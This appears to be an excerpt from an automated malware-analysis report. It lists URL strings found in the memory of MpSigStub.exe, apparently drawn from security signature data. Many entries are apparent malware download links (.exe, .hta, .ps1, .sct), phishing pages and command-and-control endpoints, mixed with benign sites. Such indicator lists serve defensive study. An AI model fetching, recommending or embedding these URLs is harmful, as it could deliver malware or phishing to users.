Source: MpSigStub.exe, 00000024.00000003.6296880704.00000197A4AB8000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp String found in binary or memory: http://google.com/
Source: MpSigStub.exe, 00000024.00000003.6296880704.00000197A4AB8000.00000004.00000001.sdmp String found in binary or memory: http://google.com/ID
Source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp String found in binary or memory: http://google.com/install.php?time=%d
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6316016526.00000197A4058000.00000004.00000001.sdmp String found in binary or memory: http://google.ru/js
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://gosgd.com
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://gosgd2.com
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://gpt.alarmasystems.ru/wp-content/upgrade/obi.html
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp String found in binary or memory: http://gracefullifetime.com/yqagtiljgk/530340.png
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://grandsteel.kz/stats.php
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: http://granitmdp.com/rechnung-nr-06197/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://grape53.olive.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://greenertrack.info/.well-known/acme-challenge/hp.gf
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: http://greenthdykegheedahatakankeadeshnaathfgh.ydns.eu/office360/regasm.exe
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: http://greentreee.com/src/gate.php?a
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: http://gridinsoft.com/check_ver.php?product=chmeditor&ver=
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://gstat.bluechipstaffing.com/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://gstat.chromaimagen.com/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://gstat.couturefloor.com/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://gstat.ddoborguild.com/0n1ine.exe
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://gstat.dondyablo.com/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://gstat.echowin.com/autorizz0.exe
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://gstat.globaltcms.com/autorizz0.exe
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://gstat.hamiltoncustomhomesinc.com/
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://gstat.llbntv.com/pagament1.exe
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://gstat.llbntv.org/pagament1.exe
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://gstat.securitiessupportunit.com/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://guineapig.tips/co
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://gveejlsffxmfjlswjmfm.com/files/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://gweboffice.co.uk/
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://gx3bxpo.sed.digitalmusictutorials.com
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: http://gyeuiojndhbvmaoiwnnchauwo28vnj8mjmvnwhk.ydns.eu/document.doc
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp String found in binary or memory: http://h1m2en.ddns.net/sa98as8f7/kk/1445785485
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://hackbox.f3322.org:808/Consys21.dll
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://handjobheats.com/xgi-bin/q.php
Source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp String found in binary or memory: http://hao.360.cn
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://hao.360.cn/?src=lm&
Source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp String found in binary or memory: http://hao.360.cnx
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp String found in binary or memory: http://happy-fxs.com/sms/
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://harpa.space/kgodu.dot
Source: MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp String found in binary or memory: http://hasvideo.net
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://hasvideo.net?t=
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp String found in binary or memory: http://hellos.tcp4.me/standard-bank-online-relief-funds-ucount-onlinebanking.standardbank.co.za-dire
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://helpefy.com/002/777/new%20outlook/new%20outlook/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://helpservice09.hol.es
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: http://hem1.passagen.se/fylke/
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://hgastation.com
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://hi.ru/?44
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: http://highnmightytv.com/orderss182doc.php
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://highnmightytv.com/wp-content/themes/data.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://hikangaroo5.com/images/xjs7s/gb40f_eygecpdogfzeca1xtg/ruryf1?sxps=vddxqzhm_&oof=xptbdzfnuzvdt
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://hiltrox.com
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://hit1.marinalvapn.com/silage.zip
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://ho.io/
Source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp String found in binary or memory: http://hohosearch.com/?uid=1234#red=
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://hollywoodnailspa.net/auth/tb/tb/index.html)
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp String found in binary or memory: http://hombresvalientesposadas.com/paya/reportdhlnew2.php
Source: MpSigStub.exe, 00000024.00000003.6347522364.00000197A3B80000.00000004.00000001.sdmp String found in binary or memory: http://hombresvalientesposadas.com/zek/reportdhlnew2.php
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://home.zh-cn.cc/
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://hookbase.com/Index.htm
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://host87.net
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp String found in binary or memory: http://hostserver.kr
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://hostthenpost.org/uploads/
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://hotbar.com
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://hotedeals.co.uk/ekck095032/
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: http://hotelpremier.com.br/imagens/d.doc
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://hpg.se/tmp/lns.txt
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://hqdating.net
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp String found in binary or memory: http://hqsextube08.com/getsoft/task.php?v=
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://html.hjsm.tom.com/?mod=book&act=anonsearch&key=%s
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://htmlcss.3322.org/sub/ray.js
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://http.fpki.gov/fcpca/caCertsIssuedByfcpca.p7c0
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://http://silver13.net/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://httpz.ru
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://huaned.net/?683228460
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://hvln.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: http://hyoeyeep.ws/template.doc
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://hytechmart.com
Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp String found in binary or memory: http://i.compucrush.com/i.php
Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp String found in binary or memory: http://i.compucrush.com/i.phpxD
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: http://i.imgur.com/
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: http://i.omeljs.info/omel/javascript.js?appTitle=PennyBee&channel=chkomel
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://i.sfu.edu.ph/ds/161120.gif
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://i.ttd7.cn/getsoft
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp String found in binary or memory: http://iaa.1eko.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://ianlunn.co.uk
Source: MpSigStub.exe, 00000024.00000003.6348926620.00000197A3621000.00000004.00000001.sdmp String found in binary or memory: http://ibm.dmcast.com/t.rar
Source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp String found in binary or memory: http://ibrahimovich.banouta.net/a
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: http://icanhazip.com
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://icloudstorage.moonfruit.com/?preview=y
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: http://idea-secure-login.com/3/ddg.dll5
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp String found in binary or memory: http://idmnfs.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://ie.search.psn.cn/
Source: MpSigStub.exe, 00000024.00000003.6312663720.00000197A3E58000.00000004.00000001.sdmp String found in binary or memory: http://iefeadsl.com/feat/
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: http://iframe.ip138.com/ic.asp
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://ilogs.forgetmenotbeading.com/images/get.bin%appdata%
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: http://ilya-popov.ru/wp-content/uploads/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://image.soso.com/image.cgi?w=%s
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://images-saver.pw/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://images.google.cn/images?q=%s
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://images.timekard.com/default.png
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://imd.gdyiping.com
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://img-save.xyz
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://img.zhongsou.com/i?w=%s
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp String found in binary or memory: http://imp.fusioninstall.com/impression.do/?event=installer_start&referrer=x
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp String found in binary or memory: http://imp.mymapsxp.com/
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://imp.theweathercenter.co/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://impemarinestore.com/stub.exe
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://in-t-h-e.cn/show/main.php?r=
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://incredicole.com/wp-content/themes/elegant-grunge/images/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://indonesiacyberteam.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://inent17alexe.rr
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://infolokercpns.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp String found in binary or memory: http://init.crash-analysis.com
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp String found in binary or memory: http://init.icloud-analysis.com
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp String found in binary or memory: http://init.icloud-diagnostics.com
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://injectsorals.com/
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: http://inline477.info/fsrv
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://inquiry.space/lucky.doc
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp String found in binary or memory: http://ins.quickinstallpack.com/?action=
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp String found in binary or memory: http://ins.rdxrp.com/stats/
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp String found in binary or memory: http://insf.quickinstallpack.com/?action=
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: http://insightout-me.com/backup/excellview.php
Source: MpSigStub.exe, 00000024.00000003.6327269415.00000197A3790000.00000004.00000001.sdmp String found in binary or memory: http://install.outbrowse.com/logTrack.php?x
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://install.xxxtoolbar.com/ist/scripts/prompt.php?
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://installation59.website/my/
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://installdream.com/download/blankNet2.dat
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: http://installer.mediapassplugin.com/
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://installmp3codec.info/
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://installs.hotbar.com/installs/hotbar/programs/
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: http://instamailserver.link/finito.ps1
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: http://instituitartetculture.com/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://instituthypnos.com/maps1316/ki_d/
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://int.dpool.sina.com.cn/iplookup/iplookup.php
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://integrityshavenequinerescuecentre.ca/css/oswald-webfont/test.exe
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://interface.kokmobi.com/newservice
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp String found in binary or memory: http://interstat.eux
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: http://investmenteducationkungykmtsdy8agender.duckdns.org/office/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://ios-certificate-update.com
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://ios-update-whatsapp.com
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: http://ip-api.com/
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp String found in binary or memory: http://ip-api.com/json/
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://ip.aq138.com/setip.asp
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://ippp.co.zw/ds/161120.gif
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://iranvision1404.com/ss/info/redebit_transactions/terms/kohc-xuxo_lcxty-av6e
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: http://isearch.omiga-plus.com/?type=sc
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://ismailiyamedical.com/ds/151120.gif
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://istanbulyilbasimekanlari.com/tracking-number-
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: http://istart.webssearches.com/?type=sc
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://isvbr.net
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://isvbr.net?t=
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://itemprice.kr
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://itsmetees.com/wp-admin/network/doc/
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://iy6h86i.sed.tiresnwheels4fun.com
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://iz.orda.icu/webiz.php
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://izfm.org/data/image/html/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://jL.ch&#117;ra.pl&#47;rc/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://jaculus.ru/902b3449e3e8/interbase/counteract/neat/luxurious/relate/jjibwjhi.dot
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://jaklaw.co/wp-includes/js/plupload/db/view/
Source: MpSigStub.exe, 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp String found in binary or memory: http://james.newtonking.com/projects/json
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: http://japanesecosplaygirl.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://jast56kl.com/help/index.php
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://java.sun.com/products/autodl/j2se
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: http://javascriptobfuscator.com
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://jay6.tech/wp-content/themes/twentynineteen/template-parts/cont
Source: MpSigStub.exe, 00000024.00000003.6286203133.00000197A3ABB000.00000004.00000001.sdmp String found in binary or memory: http://jetroute.net
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://jiglid.com/ms.xlsx
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://jjjjjkl.pe.hu/doc
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://jmmgroup.ae/213.doc
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://jobylive2.w22.haohaohost.cn/c/abbx/qqpost.asp
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp String found in binary or memory: http://joelosteel.gdn/eml/put.php
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp String found in binary or memory: http://joelosteel.gdn/pi.php
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://josephioseph.com/htamandela.hta
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp String found in binary or memory: http://joxi.ru/
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://jquerystatistics.org/update.js
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://js.f4321y.com/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://js.k0102.com/ad
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp String found in binary or memory: http://js.mykings.pw:280/v.sctscrobj.dll
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://js.mys2018.xyz:280/v.sct
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://js.pkglayer.com
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://js.pkglayer.comx
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://jugnitv.com/final.jpg
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://jump.qq.com/clienturl_
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: http://jump.qq.com/clienturl_100?clientuin=
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: http://jump.qq.com/clienturl_15
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: http://juntec.es/rechnung-18561/
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: http://jxmienphi.net/update/
Source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp String found in binary or memory: http://jxvh.com/goto.php
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp String found in binary or memory: http://jyhjyy.top
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://kapper.st/info.txt
Source: MpSigStub.exe, 00000024.00000003.6278189283.00000197A3970000.00000004.00000001.sdmp String found in binary or memory: http://karab.hopto.org/sarg.dot
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://karadyma.com/dhlpack/kfqakff/)
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://karafetdoll.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp String found in binary or memory: http://kavok.ind.br/ds/2312.gif
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: http://kec-rupit.muratarakab.go.id/si/excelz/index.php?email=
Source: MpSigStub.exe, 00000024.00000003.6285606128.00000197A309B000.00000004.00000001.sdmp String found in binary or memory: http://keeppure.cn/tool/xxz.exe
